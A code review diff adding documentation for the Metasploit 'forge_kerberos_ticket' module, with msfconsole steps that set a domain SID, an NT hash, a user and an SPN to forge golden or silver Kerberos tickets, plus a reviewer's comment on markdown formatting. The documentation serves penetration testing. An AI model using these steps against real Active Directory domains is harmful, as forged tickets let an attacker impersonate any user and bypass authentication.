documentation/modules/auxiliary/admin/kerberos/forge_kerberos_ticket.md

```diff
@@ -0,0 +1,31 @@
+# Kerberos Ticket Forging (Golden/Silver tickets)
+
+The `forge_kerberos_ticket` module allows the forging of a golden or silver ticket.
+
+## Vulnerable Application
+
+Any system leveraging kerberos as a means of authentication e.g. Active Directory, MSSQL
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: ```use auxiliary/admin/kerberos/forge_kerberos_ticket```
+3. Do: ```set DOMAIN DW.LOCAL```
+4. Do: ```set DOMAIN_SID S-1-5-21-1755879683-3641577184-3486455962```
+5. Do: ```set NTHASH 88E4D9FABAECF3DEC18DD80905521B29```
+7. Do: ```set USER fake_user```
+6. Do: ```set SPN MSSqlSvc/dc1.dw.local:1433``` (Option only used for silver tickets)
+8. Do: ```silver``` to generate a silver ticket or ```golden``` for a golden ticket
```

Comment:
These should use single backticks for inline code 👀 

I normally run my stuff through https://prettier.io/playground and select the markdown parser